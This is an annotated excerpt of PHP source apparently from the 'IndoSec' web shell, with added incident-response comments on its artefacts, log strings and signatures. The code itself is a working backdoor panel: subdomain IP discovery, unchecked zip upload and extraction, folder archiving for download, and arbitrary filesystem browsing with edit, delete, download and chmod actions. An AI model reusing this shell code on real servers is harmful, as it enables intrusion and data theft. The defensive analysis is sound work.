  // The option value is spelled "direct-conntect" in the form and in this test;
  // the host name actually looked up is "direct-connect.".
  2251. if($_POST['idsPilih'] == "direct-conntect") {
  2252. $direct = gethostbyname("direct-connect."."$target");
  2253. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2254. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$direct</font></p>";
  2255. }
  2256. if($_POST['idsPilih'] == "webmail") {
  2257. $web = gethostbyname("webmail."."$target");
  2258. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2259. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$web</font></p>";
  2260. }
  2261. if($_POST['idsPilih'] == "cpanel") {
  2262. $cpanel = gethostbyname("cpanel."."$target");
  2263. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2264. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$cpanel</font></p>";
  2265. }
  2266. exit;
  2267. }
  2268.  
  2269.  
  2270. /*
  2271. * Zip Menu
  2272. * IndoSec
  2273. */
  2274. if($_GET['aksi'] == 'zip_menu') {
        // Archive panel, reached with aksi=zip_menu. Declares Zip() and Zip_Extrack()
        // inside this branch, then handles three POST actions: upnun (upload and
        // extract), backup (archive a folder) and extrak (extract an existing archive).
        // $dir and swall() are defined outside this excerpt.
        // Artefacts for incident response: "<basename of $dir>.zip" files written
        // inside the archived folder, and "<archive name>_unzip" directories.
  2275. //Compress/Zip
  2276. $exzip = basename($dir).'.zip';
        /**
         * Write $source (a file, or a directory tree walked recursively) into a zip
         * archive at $destination.
         *
         * Returns false when the zip extension is missing or $source does not exist;
         * otherwise returns the result of ZipArchive::close().
         * Every regular file under $source is read in full with file_get_contents(),
         * so the archive holds whatever the PHP process can read there.
         */
  2277. function Zip($source, $destination){
  2278. if (extension_loaded('zip') === true){
  2279. if (file_exists($source) === true){
  2280. $zip = new ZipArchive();
  2281. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){
  2282. $source = realpath($source);
  2283. if (is_dir($source) === true){
  2284. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  2285. foreach ($files as $file){
  2286. $file = realpath($file);
  2287. if (is_dir($file) === true){
  2288. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  2289. }elseif(is_file($file) === true){
  2290. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  2291. }
  2292. }
  2293. }elseif(is_file($source) === true){
  2294. $zip->addFromString(basename($source), file_get_contents($source));
  2295. }
  2296. }
  2297. return @$zip->close();
  2298. }
  2299. }
  2300. return false;
  2301. }
  2302. //Extract/Unzip
        /**
         * Extract the archive $zip_files into "$to_dir/<archive basename>_unzip".
         *
         * Returns false when the archive cannot be opened, otherwise the result of
         * ZipArchive::close(). Entry names are not inspected before extractTo(), and
         * mkdir() is called with the bare directory name, i.e. relative to the
         * current working directory.
         */
  2303. function Zip_Extrack($zip_files, $to_dir){
  2304. $zip = new ZipArchive();
  2305. $res = $zip->open($zip_files);
  2306. if ($res === TRUE) {
  2307. $name = basename($zip_files, ".zip")."_unzip";
  2308. @mkdir($name);
  2309. @$zip->extractTo($to_dir."/".$name);
  2310. return @$zip->close();
  2311. }else{
  2312. return false;
  2313. }
  2314. }
  2315.  
  2316. echo '<div class="card card-body text-dark mb-4">
  2317. <h4 class="text-center">Zip Menu</h3>
  2318. <form enctype="multipart/form-data" method="post">
  2319. <div class="form-group">
  2320. <label>Zip File:</label>
  2321. <div class="custom-file">
  2322. <input type="file" name="zip_file" class="custom-file-input" id="customFile">
  2323. <label class="custom-file-label" for="customFile">Choose file</label>
  2324. </div>
  2325. <input type="submit" name="upnun" class="btn btn-danger btn-block mt-3" value="Upload & Unzip"/>
  2326. </div>
  2327. </form>';
        // Upload-and-extract: the client-supplied file name is used as-is for the
        // destination path, with no check of extension or content.
  2328. if($_POST["upnun"]) {
  2329. $filename = $_FILES["zip_file"]["name"];
  2330. $tmp = $_FILES["zip_file"]["tmp_name"];
  2331. if(move_uploaded_file($tmp, "$dir/$filename")){
  2332. echo Zip_Extrack($filename, $dir);
  2333. unlink($filename);
  2334. $swa = "success";
  2335. $text = "Berhasil Mengekstrak Zip";
  2336. swall($swa,$text,$dir);
  2337. } else {
  2338. echo "<b>Gagal!</b>";
  2339. }
  2340. }
  2341.  
  2342. echo "<div class='row'><div class='col-md-6 mb-3'><h5>Zip Backup</h5>
  2343. <form method='post'>
  2344. <label>Folder</label>
  2345. <input type='text' name='folder' class='form-control mb-3' value='$dir'>
  2346. <input type='submit' name='backup' class='btn btn-danger btn-block' value='Backup!'>
  2347. </form>";
        // Backup: archives the POSTed folder into "<folder>/<basename of $dir>.zip".
        // NOTE(review): if that folder sits under the document root, the archive is
        // presumably reachable over HTTP; check for such files during cleanup.
  2348. if($_POST['backup']){
  2349. $fol = $_POST['folder'];
  2350. if(Zip($fol, $_POST["folder"].'/'.$exzip)){
  2351. $swa = "success";
  2352. $text = "Berhasil Membuat Zip";
  2353. swall($swa,$text,$dir);
  2354. }else{
  2355. echo "<b>Gagal!</b>";
  2356. }
  2357. }
  2358.  
  2359. echo "</div>
  2360. <div class='col-md-6'><h5>Unzip Manual</h5>
  2361. <form action='' method='post'>
  2362. <label>Zip Location:</label>
  2363. <input type='text' name='file_zip' class='form-control mb-3' value='$dir/$exzip'>
  2364. <input type='submit' name='extrak' class='btn btn-danger btn-block' value='Unzip!'>
  2365. </form>";
        // Manual unzip: extracts the archive at the POSTed path file_zip under $dir.
  2366. if($_POST['extrak']){
  2367. $zip = $_POST["file_zip"];
  2368. if (Zip_Extrack($zip, $dir)){
  2369. $swa = "success";
  2370. $text = "Berhasil Mengekstrak Zip";
  2371. swall($swa,$text,$dir);
  2372. }else{
  2373. echo "<b>Gagal!</b>";
  2374. }
  2375. }
  2376. echo '</div></div></div>';
  2377.  
  2378. }
  2379.  
  2380. if(isset($_GET['path'])){
        // The working directory is taken straight from the path query parameter.
        // Nothing restricts it to the web root, so the listing below covers any
        // directory the PHP process can enter.
  2381. $path = $_GET['path'];
  2382. chdir($path);
  2383. }else{
  2384. $path = getcwd();
  2385. }
        // Normalise Windows separators, then split the path into its components.
  2386. $path = str_replace('\\','/',$path);
  2387. $paths = explode('/',$path);
        // Breadcrumb: each path component is written into an <a href="?dir=..."> link
        // without HTML escaping.
  2388. echo "Path : ";
  2389. foreach($paths as $id=>$pat){
  2390. if($pat == '' && $id == 0){
  2391. $a = true;
  2392. echo '<a href="?dir=/">/</a>';
  2393. continue;
  2394. }
  2395. if($pat == '') continue;
  2396. echo '<a style="word-wrap:break-word;" href="?dir=';
  2397. for($i=0;$i<=$id;$i++){
  2398. echo "$paths[$i]";
  2399. if($i != $id) echo "/";
  2400. }
  2401. echo '">'.$pat.'</a>/';
  2402. }
        // Directory listing consumed by the two loops that follow. w(), perms() and
        // $dir are defined outside this excerpt.
  2403. $scandir = scandir($path);
  2404. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  2405. echo '<div id="tab"><table class="text-white mt-1 table-hover table-responsive">
  2406. <thead class="bg-info text-center">
  2407. <th class="text-left">File/Folder</th>
  2408. <th>Size</th>
  2409. <th style="width:50%;">Last Modified</th>
  2410. <th>Permission</th>
  2411. <th>Action</th>
  2412. </thead>';
  2413.  
  2414. foreach($scandir as $dir){
        // First pass over the listing: one table row per sub-directory. The links
        // carry aksi=chmod_dir, aksi=rename_folder and aksi=hapus_folder together
        // with dir=<path>, which are useful strings when searching access logs.
        // $imgfol and perms() are defined outside this excerpt.
  2415. $dtime = date("d/m/y G:i", filemtime("$dir/$dirx"));
  2416. /* check whether this entry is a folder */
  2417. /* check whether the folder name is too long */
  2418. if (strlen($dir) > 18) {
  2419. $_dir = substr($dir, 0, 18)."...";
  2420. }else{
  2421. $_dir = $dir;
  2422. }
  2423. $_diir = $_dir;
        // Skip anything that is not a directory, and the "." and ".." entries.
  2424. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  2425.  
  2426. echo '<tr class="text-center">
  2427. <td class="pinggir">'.$imgfol.' <a href="?dir='.$path.'/'.$dir.'">'.$_diir.'</a></td>
  2428. <td>--</td>
  2429. <td>
  2430. '.$dtime.'
  2431. </td>
  2432. <td>
  2433. <a href="?dir='.$path.'/'.$dir.'&aksi=chmod_dir">
  2434. ';
        // Permission string coloured green when writable, red when unreadable.
  2435. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
  2436. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  2437. echo perms($path.'/'.$dir);
  2438. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></a></td>
  2439. <td><a title="Rename" class="badge badge-success" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Delete" class="badge badge-danger" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>
  2440. </td>';
  2441. }
  2442.  
  2443. foreach($scandir as $file){
        // Second pass over the listing: one table row per regular file. The action
        // links carry aksi=view, edit, rename, hapusf, download and chmod_file
        // together with file=<path>, which is how this panel's file operations
        // appear in access logs. formatSize() and perms() are defined outside this
        // excerpt.
  2444. $ftime = date("d/m/y G:i", filemtime("$path/$file"));
  2445. /* check whether this entry is a file */
  2446. if(!is_file($path.'/'.$file)) continue;
  2447. echo '<tr class="text-center">
  2448. <td class="pinggir"><img src="';
  2449.  
  2450. /* set the image based on the file extension; the icons are hot-linked from
           third-party hosts, so these URLs are fixed strings in the file that static
           signatures can match */
  2451. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
  2452. if($ext == "php") {
  2453. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
  2454. }elseif ($ext == "html") {
  2455. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
  2456. }elseif ($ext == "css") {
  2457. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
  2458. }elseif ($ext == "png") {
  2459. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
  2460. }elseif ($ext == "jpg") {
  2461. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
  2462. }elseif ($ext == "jpeg") {
  2463. echo 'http://i.imgur.com/e8mkvPf.png"';
  2464. }elseif($ext == "zip") {
  2465. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
  2466. }elseif ($ext == "js") {
  2467. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
  2468. }elseif ($ext == "ttf") {
  2469. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
  2470. }elseif ($ext == "otf") {
  2471. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
  2472. }elseif ($ext == "txt") {
  2473. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
  2474. }elseif ($ext == "ico") {
  2475. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
  2476. }elseif ($ext == "conf") {
  2477. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
  2478. }elseif ($ext == "htaccess") {
  2479. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
  2480. }elseif ($ext == "sh") {
  2481. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
  2482. }elseif ($ext == "py") {
  2483. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
  2484. }elseif ($ext == "indsc") {
  2485. echo 'https://image.flaticon.com/icons/png/512/1265/1265511.png';
  2486. }elseif ($ext == "sql") {
  2487. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
  2488. }elseif ($ext == "pl") {
  2489. echo 'http://i.imgur.com/PnmX8H9.png';
  2490. }elseif ($ext == "pdf") {
  2491. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
  2492. }elseif ($ext == "mp4") {
  2493. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
  2494. }elseif ($ext == "mp3") {
  2495. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
  2496. }elseif ($ext == "git") {
  2497. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
  2498. }elseif ($ext == "md") {
  2499. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
  2500. }else{
  2501. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
  2502. }
  2503. echo '" class="ico2"></img>';
  2504. /* check whether the file name is too long */
  2505. if (strlen($file) > 25) {
  2506. $_file = substr($file, 0, 25)."...-.".$ext;
  2507. }else{
  2508. $_file = $file;
  2509. }
        // File names and paths are written into the markup without HTML escaping.
  2510. echo' <a href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">'.$_file.'</a></td>
  2511. <td>'.formatSize(filesize($file)).'</td>
  2512. <td>'.$ftime.'</td>
  2513. <td><a href="?dir='.$path.'&aksi=chmod_file&file='.$path.'/'.$file.'" class="text-center">';
        // Permission string coloured green when writable, red when unreadable.
  2514. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
  2515. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  2516. echo perms($path.'/'.$file);
  2517. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font></a></td>
  2518. <td class="d-flex">
  2519. <a title="Lihat" class="badge badge-info" href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">&nbsp;<i class="fa fa-eye"></i>&nbsp;</a>&nbsp;&nbsp;
  2520. <a title="Edit" class="badge badge-success" href="?dir='.$path.'&aksi=edit&file='.$path.'/'.$file.'">&nbsp;<i class="far fa-edit"></i>&nbsp;</a>&nbsp;&nbsp;
  2521. <a title="Rename" class="badge badge-success" href="?dir='.$path.'&aksi=rename&file='.$path.'/'.$file.'">&nbsp;<i class="fa fa-pencil"></i>&nbsp;</a>&nbsp;&nbsp;
  2522. <a title="Delete" class="badge badge-danger" href="?dir='.$path.'&aksi=hapusf&file='.$path.'/'.$file.'" title="Delete">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>&nbsp;&nbsp;
  2523. <a title="Download" class="badge badge-primary" href="?&dir='.$path.'&aksi=download&file='.$path.'/'.$file.'" title="Download">&nbsp;<i class="fa fa-download"></i>&nbsp;</a>
  2524. </td>
  2525. </tr>';
  2526. }
  2527. echo '</table></div></div></div><hr/>
  2528. <center><a class="text-muted" href="https://local-hunter.com/">Copyright 2019 { IndoSec }</a></center><br/>';
        // Footer markup. The "{ IndoSec }" text, the linked domain and the scrollToTop
        // class are fixed strings in this file, usable for static matching.
  2529. echo "<a href='#' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>";
  2530. /*
  2531. End
  2532. */
  2533. ?>